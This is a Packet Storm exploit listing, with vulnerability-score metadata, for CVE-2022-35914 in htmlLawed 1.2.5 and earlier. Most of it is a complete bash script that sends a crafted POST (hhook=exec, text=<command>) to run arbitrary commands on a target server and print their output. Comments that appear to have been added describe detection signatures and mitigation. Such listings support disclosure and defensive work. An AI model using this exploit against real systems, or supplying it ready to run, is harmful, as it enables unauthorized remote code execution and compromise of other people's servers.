packetstorm · D4t4s3c · PACKETSTORM:178425
History: May 02, 2024 - 12:00 a.m.

htmlLawed 1.2.5 Remote Command Execution

2024-05-02 00:00:00
d4t4s3c
packetstormsecurity.com
153
remote code execution
htmllawed
bioinformatics

AI Score: 7 (High), Confidence: Low

EPSS: 0.974 (High), Percentile: 99.9%

`#!/bin/bash  
  
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution  
  
# Date: 2024-05-02  
# Exploit Author: Miguel Redondo (aka d4t4s3c)  
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed  
# Software Link: https://github.com/kesar/HTMLawed  
# Version: <= 1.2.5  
# Tested on: Linux  
# Category: Web Application  
# CVE: CVE-2022-35914  
  
# Proof-of-concept client for CVE-2022-35914, annotated for defenders.
# It issues a single HTTP POST to the given URL and prints the parsed reply.
#
# Option parsing: -u <url> is the endpoint contacted, -c <cmd> is the string
# placed in the "text" form field. parameter_counter is incremented per option
# but is not read anywhere in this listing.
while getopts ":u:c:" arg; do  
case ${arg} in  
u) url=${OPTARG}; let parameter_counter+=1 ;;  
c) cmd=${OPTARG}; let parameter_counter+=1 ;;  
esac  
done  
  
# Both options are required; if either is empty, print the usage banner and exit 1.
if [ -z "${url}" ] || [ -z "${cmd}" ]; then  
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  
echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"  
exit 1  
else  
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  
echo -e "\n[+] Executing Command: ${cmd}\n"  
# Request shape, usable as a detection signature: a POST (curl -d) whose body
# carries sid=foo, hhook=exec and text=<cmd>, sent with a cookie sid=foo that
# matches the sid form field.
# NOTE(review): presumably hhook names the PHP function the endpoint applies to
# "text"; confirm against the htmLawed source.
# Detection: inspect request bodies (WAF/IDS) for an hhook= field naming a
# command-execution function such as exec.
# Mitigation: the header of this listing gives affected versions as <= 1.2.5;
# upgrade past that and keep the endpoint unreachable from untrusted clients.
#
# Response handling: egrep keeps only lines of the form "&nbsp; [N] =>" and sed
# strips that prefix and the trailing "<br />", leaving the value on each line.
# curl -s hides transfer errors, so a failed request yields empty output.
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')  
echo -e "${cmd_output}\n"  
# Exit status is 0 unconditionally; it does not reflect whether the request succeeded.
exit 0  
fi  
`